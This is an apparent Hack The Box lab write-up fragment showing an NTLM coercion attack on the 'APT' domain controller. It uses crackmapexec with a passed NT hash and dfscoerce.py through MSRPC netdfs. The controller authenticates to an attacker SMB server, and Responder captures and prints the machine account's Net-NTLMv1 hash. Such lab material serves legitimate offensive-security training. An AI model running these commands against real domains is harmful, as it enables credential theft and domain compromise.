NTLM Relay via MSRPC netdfs
Another solution to invoke a SYSTEM level Net-NTLMv1 authentication to an attacker controlled SMB server
This can be done as any regular domain user without elevating privileges to the henry.vinson_adm user
testing
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ crackmapexec smb apt.htb.local -d HTB.LOCAL -u henry.vinson -H 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -M dfscoerce
SMB apt.htb.local 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB apt.htb.local 445 APT [+] HTB.LOCAL\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb
DFSCOERC... apt.htb.local 445 APT VULNERABLE
DFSCOERC... apt.htb.local 445 APT Next step: https://github.com/Wh04m1001/DFSCoerceDFSCoerce
┌──(kali㉿kali)-[~/…/htb/labs/apt/DFSCoerce]
└─$ python3 dfscoerce.py 10.10.16.8 $ipv6 -d htb.local -u henry.vinson -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip $IPv6 -target-ip $IPv6
[-] connecting to ncacn_np:dead:beef::b885:d62a:d679:573f[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
servername: '10.10.16.8\x00'
rootshare: 'test\x00'
apiflags: 1
dcerpc runtime error: code: 0x5 - rpc_s_access_denied Done
[smb] ntlmv1 client : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788on Responder
Moving on to cracking